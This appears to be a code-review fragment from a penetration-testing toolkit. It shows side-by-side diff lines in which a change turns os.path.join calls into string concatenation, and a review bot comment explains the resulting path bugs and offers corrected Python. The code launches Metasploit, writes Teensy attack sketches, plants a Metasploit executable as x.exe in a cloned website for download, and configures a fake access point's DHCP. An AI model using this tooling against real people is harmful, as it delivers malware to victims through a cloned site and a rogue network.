print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC) print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
try: try:
if operating_system != "windows": if operating_system != "windows":
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir, "meta_config"))) os.path.join(core.setdir + "meta_config")))
child1.interact() child1.interact()
except: except:
if operating_system != "windows": if operating_system != "windows":
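Review bot: The `.format(webclone_path + metasploit_exec_path + os.path.join(webclone_path + "x.exe"))` call now receives one concatenated string, so `{1}` and `{2}` raise IndexError and the web_clone directory is never created; the three arguments must stay separate. `os.path.join(webclone_path + "x.exe")` also yields `…/web_clonex.exe` (no separator) here and in the else branch, and `os.path.join("src/teensy" + filename)` in writefile yields `src/teensy<filename>`, so the template file is never found; the PDE-created banner builds `reportsteensy_…` the same way. The rewritten lines below keep the two-argument join where a separator is needed; the rest of the script is unchanged.
```python
def writefile(filename, now):
    with open(os.path.join("src/teensy", filename)) as fileopen, \
            open(core.setdir + "/reports/teensy_{0}.pde".format(now), "w") as filewrite:
        # … unchanged: IPADDR substitution loop …
# … unchanged: PDE-created banner, pause prompt …
if payload_counter == 1:
    webclone_path = os.path.join(core.setdir, "web_clone")
    metasploit_exec_path = os.path.join(core.setdir, "msf.exe")
    if not apache:
        subprocess.Popen("mkdir {0};"
                         "cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path,
                                                                        metasploit_exec_path,
                                                                        os.path.join(webclone_path, "x.exe")),
                         shell=True).wait()
    # … unchanged: web_server spawn …
    else:
        subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait()
    # … unchanged: meta_config check and MSF listener launch …
```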


@ -89,14 +89,14 @@ else:
if fakeap_dhcp_menu_choice == "1": if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out # writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set") core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite: with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1) filewrite.write(dhcp_config1)
dhcptun = 1 dhcptun = 1
if fakeap_dhcp_menu_choice == "2": if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out # writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set") core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite: with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config2) filewrite.write(dhcp_config2)
dhcptun = 2 dhcptun = 2